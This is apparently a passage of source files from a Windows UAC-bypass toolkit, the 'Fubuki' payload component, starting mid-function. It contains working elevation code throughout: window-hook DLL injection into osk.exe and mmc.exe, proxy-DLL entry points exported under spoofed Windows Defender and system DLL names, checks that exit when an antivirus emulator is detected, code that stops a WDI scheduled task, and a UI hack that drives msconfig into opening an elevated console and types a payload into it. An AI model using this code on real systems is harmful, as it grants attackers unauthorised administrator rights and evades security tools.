ucmQueryRuntimeInfo(FALSE);
}
//
// Notify Akagi.
//
if (bSharedParamsReadOk) {
ucmDbgMsg(L"Fubuki, completion\r\n");
ucmSetCompletion(g_SharedParams.szSignalObject);
}
RtlExitUserProcess(ExitCode);
}
/*
* UiAccessMethodHookProc
*
* Purpose:
*
* Window hook procedure for UiAccessMethod
*
*/
LRESULT CALLBACK UiAccessMethodHookProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
/*
* UiAccessMethodPayload
*
* Purpose:
*
* Defines application context and either:
* - if fInstallHook set - installs windows hook for dll injection
* - run default payload in target app context
*
*/
VOID UiAccessMethodPayload(
_In_ HINSTANCE hinstDLL,
_In_ BOOL fInstallHook,
_In_opt_ LPWSTR lpTargetApp
)
{
LPWSTR lpFileName;
HHOOK hHook;
HOOKPROC HookProcedure;
TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;
WCHAR szModuleName[MAX_PATH + 1];
RtlSecureZeroMemory(szModuleName, sizeof(szModuleName));
if (GetModuleFileName(NULL, szModuleName, MAX_PATH) == 0)
return;
lpFileName = _filename(szModuleName);
if (lpFileName == NULL)
return;
if (fInstallHook) {
//
// Check if we are in the required application context
// Are we inside osk.exe?
//
if (_strcmpi(lpFileName, TEXT("osk.exe")) == 0) {
HookProcedure = (HOOKPROC)GetProcAddress(hinstDLL, FUBUKI_WND_HOOKPROC); //UiAccessMethodHookProc
if (HookProcedure) {
hHook = SetWindowsHookEx(WH_CALLWNDPROC, HookProcedure, hinstDLL, 0);
if (hHook) {
//
// Timeout to be enough to spawn target app.
//
Sleep(15000);
UnhookWindowsHookEx(hHook);
}
}
RtlExitUserProcess(0);
}
}
//
// If target application name specified - check are we inside target app?
//
if (lpTargetApp) {
if (_strcmpi(lpFileName, lpTargetApp) == 0) {
DefaultPayload();
}
}
else {
//
// Use any suitable elevated context.
//
if (ucmGetProcessElevationType(NULL, &TokenType)) {
if (TokenType == TokenElevationTypeFull) {
DefaultPayload();
}
}
}
}
/*
* UiAccessMethodDllMain
*
* Purpose:
*
* Proxy dll entry point for uiAccess method.
* Need dedicated entry point because of additional code.
*
*/
BOOL WINAPI UiAccessMethodDllMain(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
WCHAR szMMC[] = { L'm', L'm', L'c', L'.', L'e', L'x', L'e', 0 };
UNREFERENCED_PARAMETER(lpvReserved);
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('foff');
}
if (fdwReason == DLL_PROCESS_ATTACH) {
UiAccessMethodPayload(hinstDLL, TRUE, szMMC);
}
return TRUE;
}
/*
* DllMain
*
* Purpose:
*
* Default proxy dll entry point.
*
*/
BOOL WINAPI DllMain(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
UNREFERENCED_PARAMETER(hinstDLL);
UNREFERENCED_PARAMETER(lpvReserved);
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('foff');
}
if (fdwReason == DLL_PROCESS_ATTACH) {
DefaultPayload();
}
return TRUE;
}
/*
* EntryPointExeMode
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointExeMode(
VOID
)
{
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('foff');
}
DefaultPayload();
}
/*
* EntryPointUIAccessLoader
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointUIAccessLoader(
VOID
)
{
ULONG r = 0;
WCHAR szParam[MAX_PATH * 2];
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('foff');
}
if (GetCommandLineParam(GetCommandLine(), 0, szParam, MAX_PATH, &r)) {
if (r > 0) {
ucmUIHackExecute(szParam);
}
}
RtlExitUserProcess(0);
}
/*
* EntryPointUIAccessLoader2
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointUIAccessLoader2(
VOID
)
{
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('foff');
}
ucmUIHackExecute2();
RtlExitUserProcess(0);
}
/*
* EntryPointSxsConsent
*
* Purpose:
*
* Entry point to be used by consent sxs method.
*
*/
BOOL WINAPI EntryPointSxsConsent(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
BOOL bSharedParamsReadOk;
PWSTR lpParameter;
ULONG cbParameter;
UNREFERENCED_PARAMETER(lpvReserved);
ucmDbgMsg(LoadedMsg);
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)
RtlExitUserProcess('foff');
if (fdwReason == DLL_PROCESS_ATTACH) {
LdrDisableThreadCalloutsForDll(hinstDLL);
//
// Read shared params block.
//
RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
if (bSharedParamsReadOk) {
lpParameter = g_SharedParams.szParameter;
cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
}
else {
lpParameter = NULL;
cbParameter = 0UL;
}
ucmLaunchPayloadEx(
CreateProcessW,
lpParameter,
cbParameter);
//
// Notify Akagi.
//
if (bSharedParamsReadOk) {
ucmSetCompletion(g_SharedParams.szSignalObject);
}
}
return TRUE;
}
/*
* EntryPointBackupLocked
*
* Purpose:
*
* Entry point to be used by QuickAssist method.
*
*/
BOOL WINAPI EntryPointBackupLocked(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
BOOL bSharedParamsReadOk;
PWSTR lpParameter;
ULONG cbParameter;
UNREFERENCED_PARAMETER(lpvReserved);
ucmDbgMsg(LoadedMsg);
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)
RtlExitUserProcess('foff');
if (fdwReason == DLL_PROCESS_ATTACH) {
ucmHideMainWindow();
LdrDisableThreadCalloutsForDll(hinstDLL);
//
// Read shared params block.
//
RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
if (bSharedParamsReadOk) {
lpParameter = g_SharedParams.szParameter;
cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
}
else {
lpParameter = NULL;
cbParameter = 0UL;
}
ucmLaunchPayload3(lpParameter, cbParameter);
//
// Notify Akagi.
//
if (bSharedParamsReadOk) {
ucmSetCompletion(g_SharedParams.szSignalObject);
}
}
return TRUE;
}
================================================
FILE: Source/Fubuki/export.def
================================================
EXPORTS
;DllRegisterServer = DummyFunc PRIVATE
; WOW64LOG
Wow64LogSystemService = DummyFunc
Wow64LogInitialize = DummyFunc
Wow64LogTerminate = DummyFunc
Wow64LogMessageArgList = DummyFunc
; COMMCTL
TaskDialogIndirect = DummyFunc @345
; Main routines
MpManagerOpen = UiAccessMethodDllMain
MpHandleClose = UiAccessMethodHookProc
MpScanStart = EntryPointExeMode
MpScanControl = EntryPointUIAccessLoader
MpUpdateEngine = EntryPointUIAccessLoader2
MpThreatOpen = EntryPointSxsConsent
MpThreatEnumerate = EntryPointBackupLocked
MpManagerStatusQuery = pcaEntryPointLoader
MpManagerStatusQueryEx = pcaEntryPointDll
; MSCOREE.DLL
ClrCreateManagedInstance = DummyFunc
CorBindToRuntimeEx = DummyFunc
LoadLibraryShim = DummyFunc
; OSKSUPPORT.DLL
InitializeOSKSupport = DummyFunc
UninitializeOSKSupport = DummyFunc
; DUSER.DLL
InvalidateGadget = DummyFunc
; GDIPLUS
GdipAlloc = DummyFunc
GdipCloneImage = DummyFunc
GdipCreateBitmapFromStream = DummyFunc
GdipCreateFromHDC = DummyFunc
GdipCreateHBITMAPFromBitmap = DummyFunc
GdipCreateLineBrushI = DummyFunc
GdipCreateSolidFill = DummyFunc
GdipDeleteBrush = DummyFunc
GdipDeleteGraphics = DummyFunc
GdipDisposeImage = DummyFunc
GdipFillRectangleI = DummyFunc
GdipFree = DummyFunc
GdiplusShutdown = DummyFunc
GdiplusStartup = DummyFunc
; WDI
WdiDiagnosticModuleMain = WdiStubGeneric
WdiHandleInstance = WdiStubGeneric
WdiGetDiagnosticModuleInterfaceVersion
; Rest of exports
MpManagerDisable = DummyFunc
MpManagerEnable = DummyFunc
MpManagerVersionQuery = DummyFunc
MpMemoryScanStart = DummyFunc
MpGetEngineVersion = DummyFunc
; ISCSIEXE.DLL
SvchostPushServiceGlobals = DummyFunc
DiscpEstablishServiceLinkage = DummyFunc
ServiceMain = DummyFunc
================================================
FILE: Source/Fubuki/fubuki.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2023
*
* TITLE: FUBUKI.H
*
* VERSION: 3.64
*
* DATE: 04 Feb 2023
*
* Fubuki global include header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#if !defined UNICODE
#error ANSI build is not supported
#endif
#include "shared\shared.h"
#include "shared\libinc.h"
#include "shared\cmdline.h"
#include "uihacks.h"
#include "pca.h"
//
// Forwards
//
#include "winmm.h"
#include "atldll.h"
#define LoadedMsg TEXT("Fubuki lock and loaded")
//default execution flow
#define AKAGI_FLAG_KILO 1
//suppress all additional output
#define AKAGI_FLAG_TANGO 2
extern UACME_PARAM_BLOCK g_SharedParams;
================================================
FILE: Source/Fubuki/pca.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2021 - 2025
*
* TITLE: PCA.C
*
* VERSION: 3.69
*
* DATE: 07 July 2025
*
* Fubuki Program Compatibility Assistant method support code.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "fubuki.h"
#include
#include
#include
#pragma comment(lib, "taskschd.lib")
const ULONGLONG ZERO_VALUE = 0;
/*
* WdiGetDiagnosticModuleInterfaceVersion
*
* Purpose:
*
* Stub for fake WDI exports.
*
*/
ULONG_PTR WINAPI WdiGetDiagnosticModuleInterfaceVersion(
VOID
)
{
return 1;
}
/*
* WdiStubGeneric
*
* Purpose:
*
* Stub for fake WDI exports.
*
*/
HRESULT WINAPI WdiStubGeneric(
ULONG_PTR UnusedParam1,
ULONG_PTR UnusedParam2
)
{
UNREFERENCED_PARAMETER(UnusedParam1);
UNREFERENCED_PARAMETER(UnusedParam2);
return S_OK;
}
/*
* ucmxStopTaskByName
*
* Purpose:
*
* Stop scheduled task by name.
*
*/
BOOL ucmxStopTaskByName(
_In_ LPCWSTR TaskFolder,
_In_ LPCWSTR TaskName
)
{
BOOL bResult = FALSE;
HRESULT hr;
ITaskService* pService = NULL;
ITaskFolder* pRootFolder = NULL;
IRegisteredTask* pTask = NULL;
TASK_STATE taskState;
BSTR bstrTaskFolder = NULL;
BSTR bstrTask = NULL;
VARIANT varDummy;
do {
bstrTaskFolder = SysAllocString(TaskFolder);
if (bstrTaskFolder == NULL)
break;
bstrTask = SysAllocString(TaskName);
if (bstrTask == NULL)
break;
hr = CoCreateInstance(&CLSID_TaskScheduler,
NULL,
CLSCTX_INPROC_SERVER,
&IID_ITaskService,
(void**)&pService);
if (FAILED(hr))
break;
VariantInit(&varDummy);
hr = pService->lpVtbl->Connect(pService,
varDummy,
varDummy,
varDummy,
varDummy);
if (FAILED(hr))
break;
hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);
if (FAILED(hr))
break;
hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);
if (FAILED(hr))
break;
hr = pTask->lpVtbl->get_State(pTask, &taskState);
if (FAILED(hr))
break;
if (taskState == TASK_STATE_RUNNING) {
hr = pTask->lpVtbl->Stop(pTask, 0);
}
bResult = SUCCEEDED(hr);
} while (FALSE);
if (bstrTaskFolder)
SysFreeString(bstrTaskFolder);
if (bstrTask)
SysFreeString(bstrTask);
if (pTask)
pTask->lpVtbl->Release(pTask);
if (pRootFolder)
pRootFolder->lpVtbl->Release(pRootFolder);
if (pService)
pService->lpVtbl->Release(pService);
return bResult;
}
/*
* pcaEtwCall
*
* Purpose:
*
* Write ETW events to trigger the PCA process.
*
*/
ULONG pcaEtwCall()
{
CONST GUID providerGuid = { 0x0EEF54E71, 0x661, 0x422D, {0x9A, 0x98, 0x82, 0xFD, 0x49, 0x40, 0xB8, 0x20} };
CONST EVENT_DATA_DESCRIPTOR eventUserData[3] = {
{(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},
{(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},
{(UINT_PTR)NULL, 0}
};
EVENT_DESCRIPTOR eventDescriptor;
ULONG status = 0;
eventDescriptor.Id = 0x1F46;
eventDescriptor.Version = 0;
eventDescriptor.Channel = 0x11;
eventDescriptor.Level = 4;
eventDescriptor.Opcode = 0;
eventDescriptor.Task = 0;
eventDescriptor.Keyword = 0x4000000000000100;
status = EtwEventWriteNoRegistration(
&providerGuid,
&eventDescriptor,
3,
(PEVENT_DATA_DESCRIPTOR)&eventUserData);
if (status == ERROR_SUCCESS) {
eventDescriptor.Id = 0x1F48;
status = EtwEventWriteNoRegistration(
&providerGuid,
&eventDescriptor,
3,
(PEVENT_DATA_DESCRIPTOR)&eventUserData);
}
return status;
}
/*
* pcaStopWDI
*
* Purpose:
*
* Stop WDI task and exit loader.
*
*/
ULONG pcaStopWDI()
{
HRESULT hr;
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
ucmDbgMsg(L"[PCALDR] pcaStopWDI\r\n");
hr = CoInitializeEx(NULL,
COINIT_APARTMENTTHREADED |
COINIT_DISABLE_OLE1DDE |
COINIT_SPEED_OVER_MEMORY);
if (SUCCEEDED(hr)) {
ucmSleep(1000);
if (ucmxStopTaskByName(
TEXT("Microsoft\\Windows\\WDI"),
TEXT("ResolutionHost")))
{
ucmDbgMsg(L"[PCALDR] ucmxStopTaskByName success\r\n");
ntStatus = STATUS_SUCCESS;
}
CoUninitialize();
}
return ntStatus;
}
/*
* pcaWin7Trigger
*
* Purpose:
*
* PCA Windows 7 specific trigger method.
*
*/
ULONG pcaWin7Trigger(
VOID
)
{
ucmSleep(2000);
return 0;
}
/*
* pcaEntryPointLoader
*
* Purpose:
*
* Entry point to be used in exe mode with PCA method ONLY.
*
*/
VOID WINAPI pcaEntryPointLoader(
VOID)
{
ULONG rLen = 0, status = 0;
LPCWSTR lpCmdline = GetCommandLine();
WCHAR szLoaderParam[MAX_PATH + 1];
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('foff');
}
RtlSecureZeroMemory(szLoaderParam, sizeof(szLoaderParam));
GetCommandLineParam(lpCmdline, 0, (LPWSTR)&szLoaderParam, MAX_PATH, &rLen);
if (rLen) {
if (szLoaderParam[0] == TEXT('1')) {
status = pcaEtwCall();
}
else if (szLoaderParam[0] == TEXT('2')) {
status = pcaStopWDI();
} else if(szLoaderParam[0] == TEXT('3')) {
status = pcaWin7Trigger();
}
}
else {
ucmDbgMsg(L"[PCALDR] Empty command line\r\n");
}
RtlExitUserProcess(status);
}
/*
* pcaEntryPointDll
*
* Purpose:
*
* Entry point to be used in dll mode with PCA method ONLY.
*
*/
BOOL WINAPI pcaEntryPointDll(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
BOOL bSharedParamsReadOk;
PWSTR lpParameter;
ULONG cbParameter;
HANDLE hSharedSection = NULL;
PCA_LOADER_BLOCK* pvLoaderBlock = NULL;
NTSTATUS ntStatus;
SIZE_T viewSize = PAGE_SIZE;
HANDLE hSharedEvent = NULL;
WCHAR szObjectName[MAX_PATH];
WCHAR szName[128];
WCHAR szLoaderCmdLine[2];
WCHAR szLoader[MAX_PATH + 1];
UNICODE_STRING usName;
OBJECT_ATTRIBUTES obja;
PROCESS_INFORMATION processInfo;
STARTUPINFO startupInfo;
UNREFERENCED_PARAMETER(lpvReserved);
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
RtlExitUserProcess('f0ff');
}
if (fdwReason == DLL_PROCESS_ATTACH) {
LdrDisableThreadCalloutsForDll(hinstDLL);
ucmDbgMsg(L"[PCADLL] Entry\r\n");
RtlSecureZeroMemory(&szName, sizeof(szName));
ucmGenerateSharedObjectName(FUBUKI_PCA_SECTION_ID, szName);
_strcpy(szObjectName, TEXT("\\Sessions\\"));
ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));
_strcat(szObjectName, TEXT("\\BaseNamedObjects\\"));
_strcat(szObjectName, szName);
RtlInitUnicodeString(&usName, szObjectName);
InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);
if (NT_SUCCESS(NtOpenSection(&hSharedSection,
SECTION_ALL_ACCESS,
&obja)))
{
ntStatus = NtMapViewOfSection(
hSharedSection,
NtCurrentProcess(),
&pvLoaderBlock,
0,
PAGE_SIZE,
NULL,
&viewSize,
ViewUnmap,
MEM_TOP_DOWN,
PAGE_READWRITE);
if (NT_SUCCESS(ntStatus) && pvLoaderBlock && viewSize >= sizeof(PCA_LOADER_BLOCK)) {
RtlSecureZeroMemory(&szLoader, sizeof(szLoader));
_strncpy(szLoader, MAX_PATH, pvLoaderBlock->szLoader, MAX_PATH);
ucmDbgMsg(L"[PCADLL] NtMapViewOfSection success\r\n");
RtlSecureZeroMemory(&szName, sizeof(szName));
_strcpy(szObjectName, L"\\BaseNamedObjects\\");
ucmGenerateSharedObjectName(FUBUKI_PCA_EVENT_ID, szName);
_strcat(szObjectName, szName);
RtlInitUnicodeString(&usName, szObjectName);
InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);
if (NT_SUCCESS(NtOpenEvent(&hSharedEvent, EVENT_MODIFY_STATE, &obja))) {
//
// Read shared params block.
//
RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
if (bSharedParamsReadOk) {
ucmDbgMsg(L"[PCADLL] Shared parameters read OK\r\n");
lpParameter = g_SharedParams.szParameter;
cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
}
else {
ucmDbgMsg(L"[PCADLL] Shared parameters defaulted\r\n");
lpParameter = NULL;
cbParameter = 0UL;
}
//
// Reset windir environment variable.
//
ucmSetEnvironmentVariable(T_WINDIR, USER_SHARED_DATA->NtSystemRoot);
//
// Run payload.
//
if (ucmLaunchPayload(lpParameter, cbParameter)) {
ucmDbgMsg(L"[PCADLL] Payload executed OK\r\n");
pvLoaderBlock->OpResult = FUBUKI_PCA_PAYLOAD_RUN;
}
else {
ucmDbgMsg(L"[PCADLL] Error during payload execution\r\n");
}
//
// Restart loader with "2" param.
//
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
startupInfo.cb = sizeof(startupInfo);
//
// Set loader command line.
//
szLoaderCmdLine[0] = TEXT('2');
szLoaderCmdLine[1] = 0;
if (CreateProcess(
szLoader,
szLoaderCmdLine,
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW,
NULL,
NULL,
&startupInfo,
&processInfo))
{
ucmDbgMsg(L"[PCADLL] Loader run OK\r\n");
CloseHandle(processInfo.hThread);
CloseHandle(processInfo.hProcess);
pvLoaderBlock->OpResult |= FUBUKI_PCA_LOADER_RUN;
}
else {
ucmDbgMsg(L"[PCADLL] Error during loader execution\r\n");
}
NtSetEvent(hSharedEvent, NULL);
NtClose(hSharedEvent);
ucmDbgMsg(L"[PCADLL] Shared event signaled\r\n");
//
// Notify Akagi.
//
if (bSharedParamsReadOk) {
ucmSetCompletion(g_SharedParams.szSignalObject);
}
}
else {
ucmDbgMsg(L"[PCADLL] NtOpenEvent failed\r\n");
}
NtUnmapViewOfSection(NtCurrentProcess(), pvLoaderBlock);
}
else {
ucmDbgMsg(L"[PCADLL] MapViewOfFile failed\r\n");
}
NtClose(hSharedSection);
}
else {
ucmDbgMsg(L"[PCADLL] OpenFileMapping failed\r\n");
}
}
return TRUE;
}
================================================
FILE: Source/Fubuki/pca.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2021
*
* TITLE: PCA.H
*
* VERSION: 3.56
*
* DATE: 19 July 2021
*
* Fubuki Program Compatibility Assistant related code header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef struct _PCA_LOADER_BLOCK {
ULONG OpResult;
WCHAR szLoader[MAX_PATH + 1];
} PCA_LOADER_BLOCK, * PPCA_LOADER_BLOCK;
================================================
FILE: Source/Fubuki/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by version.rc
//
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 103
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
================================================
FILE: Source/Fubuki/uihacks.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2019 - 2025
*
* TITLE: UIHACKS.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "fubuki.h"
//#define FUBUKI_TRACE_CALL
#ifdef FUBUKI_TRACE_CALL
VOID ucmxSendInput(
_In_ UINT cInputs,
_In_reads_(cInputs) LPINPUT pInputs,
_In_ int cbSize)
{
WCHAR szOut[200];
UINT r = SendInput(cInputs, pInputs, cbSize);
_strcpy(szOut, L"SendInput = ");
ultostr(r, _strend(szOut));
_strcat(szOut, L" GetLastError = ");
ultostr(GetLastError(), _strend(szOut));
_strcat(szOut, L"\r\n");
OutputDebugString(szOut);
}
#else
#define ucmxSendInput SendInput
#endif
/*
* ucmxSendControlInput
*
* Purpose:
*
* Send keyboard input to the foreground window with optional shift key.
*
*/
VOID ucmxSendControlInput(
_In_ WORD VkKey,
_In_ BOOL UseShift)
{
INPUT ip;
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.dwFlags = 0;
if (UseShift) {
ip.ki.wVk = VK_LSHIFT;
ucmxSendInput(1, &ip, sizeof(INPUT));
}
ip.ki.wVk = VkKey;
ucmxSendInput(1, &ip, sizeof(INPUT));
ip.ki.dwFlags = KEYEVENTF_KEYUP;
ucmxSendInput(1, &ip, sizeof(INPUT));
if (UseShift) {
ip.ki.wVk = VK_LSHIFT;
ip.ki.dwFlags = KEYEVENTF_KEYUP;
ucmxSendInput(1, &ip, sizeof(INPUT));
}
}
/*
* ucmxSendKeys
*
* Purpose:
*
* Send a sequence of keystrokes to the foreground window.
*
*/
VOID ucmxSendKeys(
_In_ LPWSTR lpString)
{
BOOL NeedShift;
SIZE_T i;
WORD VkAndShift;
HKL kl = LoadKeyboardLayout(TEXT("en-US"), KLF_ACTIVATE);
for (i = 0; i < _strlen(lpString); i++) {
VkAndShift = VkKeyScanEx(lpString[i], kl);
NeedShift = ((HIBYTE(VkAndShift) & 1) == 1);
ucmxSendControlInput(LOBYTE(VkAndShift), NeedShift);
}
}
/*
* ucmxElevatedConsoleCallback
*
* Purpose:
*
* Callback used to locate window of elevated console.
*
*/
BOOL CALLBACK ucmxElevatedConsoleCallback(
_In_ HWND hwnd,
_In_ LPARAM lParam
)
{
BOOL Elevated = FALSE;
DWORD dwPid;
LPWSTR lpPayload = (LPWSTR)lParam;
WCHAR szBuffer[MAX_PATH + 1];
if (GetClassName(hwnd, (LPWSTR)szBuffer, MAX_PATH)) {
if (_strcmpi(szBuffer, TEXT("ConsoleWindowClass")) == 0) {
if (GetWindowThreadProcessId(hwnd, &dwPid)) {
if (NT_SUCCESS(ucmIsProcessElevated(dwPid, &Elevated))) {
if (Elevated) {
ucmxSendKeys(lpPayload);
ucmxSendControlInput(VK_RETURN, FALSE);
return TRUE;
}
}
}
}
}
return FALSE;
}
/*
* ucmxEnumChildCallback
*
* Purpose:
*
* EnumChildWindows callback used to send keys to msconfig and cmd.
*
*/
BOOL CALLBACK ucmxEnumChildCallback(
_In_ HWND hwnd,
_In_ LPARAM lParam
)
{
UINT i;
HWND hwndButton, hwndList;
//
// Find msconfig tools listview.
//
hwndList = FindWindowEx(hwnd, NULL, TEXT("SysListView32"), TEXT("List1"));
if (hwndList) {
//SetFocus(hwndList);
//
// Navigate to cmd.exe entry in msconfig listview.
//
for (i = 0; i < 14; i++) {
ucmxSendControlInput(VK_DOWN, FALSE);
}
hwndButton = GetDlgItem(hwnd, 302);
if (hwndButton == NULL)
hwndButton = GetDlgItem(hwnd, 1117);
if (hwndButton) {
//
// Navigate to "Launch" button.
//
ucmxSendControlInput(VK_TAB, FALSE);
ucmxSendControlInput(VK_TAB, FALSE);
//
// Press "Launch" button.
//
ucmxSendControlInput(VK_RETURN, FALSE);
Sleep(1000);
//
// Send input to elevated console.
//
ucmxElevatedConsoleCallback(GetForegroundWindow(), lParam);
return FALSE;
}
#ifdef FUBUKI_TRACE_CALL
else {
OutputDebugString(L"GetDlgItem(BUTTON) failed\r\n");
}
#endif
}
return TRUE;
}
/*
* ucmxFindMainMsConfigWindow
*
* Purpose:
*
* EnumWindows callback used to locate msconfig dialog window.
*
*/
BOOL CALLBACK ucmxFindMainMsConfigWindow(
_In_ HWND hwnd,
_In_ LPARAM lParam
)
{
PSEARCH_WND SearchWnd = (PSEARCH_WND)lParam;
WCHAR szClassName[MAX_PATH * 2];
DWORD dwPid;
DWORD dwTargetPid = SearchWnd->ProcessId;
GetWindowThreadProcessId(hwnd, &dwPid);
if (dwPid == dwTargetPid) {
if (GetClassName(hwnd, szClassName, MAX_PATH)) {
if (_strcmpi(szClassName, TEXT("#32770")) == 0) {
SearchWnd->hWnd = hwnd;
return FALSE;
}
}
}
return TRUE;
}
/*
* ucmxGetHwndForMsConfig
*
* Purpose:
*
* Return dialog hwnd of msconfig.
*
*/
HWND ucmxGetHwndForMsConfig(
_In_ ULONG ProcessId
)
{
SEARCH_WND SearchWnd;
SearchWnd.ProcessId = ProcessId;
SearchWnd.hWnd = NULL;
if (!EnumWindows(ucmxFindMainMsConfigWindow, (LPARAM)&SearchWnd)) {
return SearchWnd.hWnd;
}
return NULL;
}
/*
* ucmUIHackExecute
*
* Purpose:
*
* Force msconfig to spawn elevated cmd copy via gui-hack and gui-hack it too.
*
*/
VOID ucmUIHackExecute(
_In_ LPWSTR lpPayload
)
{
HWND hwndDlg;
SHELLEXECUTEINFO shinfo;
PROCESS_BASIC_INFORMATION pbi;
WCHAR szBuffer[MAX_PATH * 2];
_strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);
_strcat(szBuffer, SYSTEM32_DIR);
_strcat(szBuffer, MSCONFIG_EXE);
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = szBuffer;
shinfo.lpParameters = TEXT("-5");
shinfo.nShow = SW_SHOW;
if (ShellExecuteEx(&shinfo)) {
RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));
if (NT_SUCCESS(NtQueryInformationProcess(shinfo.hProcess,
ProcessBasicInformation,
(PVOID)&pbi,
sizeof(PROCESS_BASIC_INFORMATION),
NULL)))
{
Sleep(1000);
hwndDlg = ucmxGetHwndForMsConfig((ULONG)pbi.UniqueProcessId);
if (hwndDlg) {
EnumChildWindows(hwndDlg, ucmxEnumChildCallback, (LPARAM)lpPayload);
}
}
TerminateProcess(shinfo.hProcess, 0);
CloseHandle(shinfo.hProcess);
}
}
/*
* ucmUIHackExecute2
*
* Purpose:
*
* GUI hack target program via sending F1 key.
*
*/
VOID ucmUIHackExecute2(
VOID
)
{
INPUT ip;
ULONG iRetry = 5;
SHELLEXECUTEINFO shinfo;
WCHAR szBuffer[MAX_PATH * 2];
HWND hwnd;
_strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);
_strcat(szBuffer, SYSTEM32_DIR);
_strcat(szBuffer, MMC_EXE);
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = szBuffer;
shinfo.lpParameters = EVENTVWR_MSC;
shinfo.nShow = SW_SHOW;
if (ShellExecuteEx(&shinfo)) {
do {
